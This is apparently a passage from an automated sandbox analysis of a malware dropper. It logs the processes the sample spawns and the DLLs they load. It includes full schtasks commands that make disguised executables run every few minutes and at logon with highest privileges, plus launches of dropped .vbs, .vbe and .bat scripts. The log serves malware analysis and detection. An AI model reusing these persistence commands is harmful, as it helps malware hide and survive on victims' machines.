            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 11 /tr "'C:\Users\Default User\Downloads\WmiPrvSE.exe'" /rl HIGHEST /f
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "zufsVvjyWcGfJFz" /sc MINUTE /mo 13 /tr "'C:\Recovery\zufsVvjyWcGfJF.exe'" /f
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "zufsVvjyWcGfJF" /sc ONLOGON /tr "'C:\Recovery\zufsVvjyWcGfJF.exe'" /rl HIGHEST /f
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "zufsVvjyWcGfJFz" /sc MINUTE /mo 14 /tr "'C:\Recovery\zufsVvjyWcGfJF.exe'" /rl HIGHEST /f
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "zufsVvjyWcGfJFz" /sc MINUTE /mo 11 /tr "'C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe'" /f
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "zufsVvjyWcGfJF" /sc ONLOGON /tr "'C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe'" /rl HIGHEST /f
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "zufsVvjyWcGfJFz" /sc MINUTE /mo 6 /tr "'C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe'" /rl HIGHEST /f
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\EunsIO9tk2.bat"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
            Source: unknownProcess created: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe
            Source: unknownProcess created: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe
            Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\6eef2b35-f577-4ffd-aafd-9efeb85439f2.vbs"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe "C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe"
            Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\da4d56e5-dd25-4b11-bec9-392111f2ec60.vbs"
            Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\Default\Downloads\WmiPrvSE.exe "C:\Users\Default User\Downloads\WmiPrvSE.exe"
            Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\e99985a1-94fc-4281-b02a-ceb1639f4b4a.vbs"
            Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\6334e2d8-afed-41d5-8a9a-b81dc662bd51.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\Default\Downloads\WmiPrvSE.exe "C:\Users\Default User\Downloads\WmiPrvSE.exe"
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\1ad27169-68a1-4284-b3a4-ab1d46640beb.vbs"
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\d096c949-588b-4f62-9035-9022be100ad8.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\Default\Downloads\WmiPrvSE.exe "C:\Users\Default User\Downloads\WmiPrvSE.exe"
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\d365112d-c481-40f0-92bb-6621c11733c0.vbs"
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\c327c276-7051-4e25-8eb9-181648a7a409.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\Default\Downloads\WmiPrvSE.exe "C:\Users\Default User\Downloads\WmiPrvSE.exe"
            Source: C:\Users\user\Desktop\4c6fK85tK7.exeProcess created: C:\Users\user\AppData\Local\Temp\ yberLoad.exe "C:\Users\user\AppData\Local\Temp\ yberLoad.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exeProcess created: C:\Users\user\AppData\Local\Temp\MVPLoader.exe "C:\Users\user\AppData\Local\Temp\MVPLoader.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exeProcess created: C:\Users\user\AppData\Local\Temp\CyberLoader.exe "C:\Users\user\AppData\Local\Temp\CyberLoader.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\msPortRefnetdhcp\zRMFcMzN1094wnGdurNck4fGlt.vbe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\msPortRefnetdhcp\file.vbs" Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\msPortRefnetdhcp\m6JlOKDKnmGOe6a.bat" "Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\msPortRefnetdhcp\componentWininto.exe "C:\msPortRefnetdhcp\componentWininto.exe"Jump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\EunsIO9tk2.bat" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe "C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\e99985a1-94fc-4281-b02a-ceb1639f4b4a.vbs"
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\6334e2d8-afed-41d5-8a9a-b81dc662bd51.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\Default\Downloads\WmiPrvSE.exe "C:\Users\Default User\Downloads\WmiPrvSE.exe"
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\1ad27169-68a1-4284-b3a4-ab1d46640beb.vbs"
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\d096c949-588b-4f62-9035-9022be100ad8.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\Default\Downloads\WmiPrvSE.exe "C:\Users\Default User\Downloads\WmiPrvSE.exe"
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\d365112d-c481-40f0-92bb-6621c11733c0.vbs"
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\c327c276-7051-4e25-8eb9-181648a7a409.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\Default\Downloads\WmiPrvSE.exe "C:\Users\Default User\Downloads\WmiPrvSE.exe"
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess created: unknown unknown
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\4c6fK85tK7.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\4c6fK85tK7.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\4c6fK85tK7.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\4c6fK85tK7.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\4c6fK85tK7.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\4c6fK85tK7.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\4c6fK85tK7.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\4c6fK85tK7.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\4c6fK85tK7.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\4c6fK85tK7.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\4c6fK85tK7.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\4c6fK85tK7.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\4c6fK85tK7.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\4c6fK85tK7.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\4c6fK85tK7.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\4c6fK85tK7.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\4c6fK85tK7.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\4c6fK85tK7.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\4c6fK85tK7.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\4c6fK85tK7.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\4c6fK85tK7.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\4c6fK85tK7.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\4c6fK85tK7.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MVPLoader.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MVPLoader.exeSection loaded: file_selector_windows_plugin.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MVPLoader.exeSection loaded: flutter_windows.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MVPLoader.exeSection loaded: msvcp140.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MVPLoader.exeSection loaded: vcruntime140_1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MVPLoader.exeSection loaded: vcruntime140.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MVPLoader.exeSection loaded: vcruntime140.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MVPLoader.exeSection loaded: vcruntime140_1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MVPLoader.exeSection loaded: vcruntime140.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: dxgidebug.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: version.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: wldp.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: profapi.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: amsi.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: userenv.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: edputil.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: propsys.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: dlnashext.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: wpdshext.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: netutils.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: slc.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: sppc.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
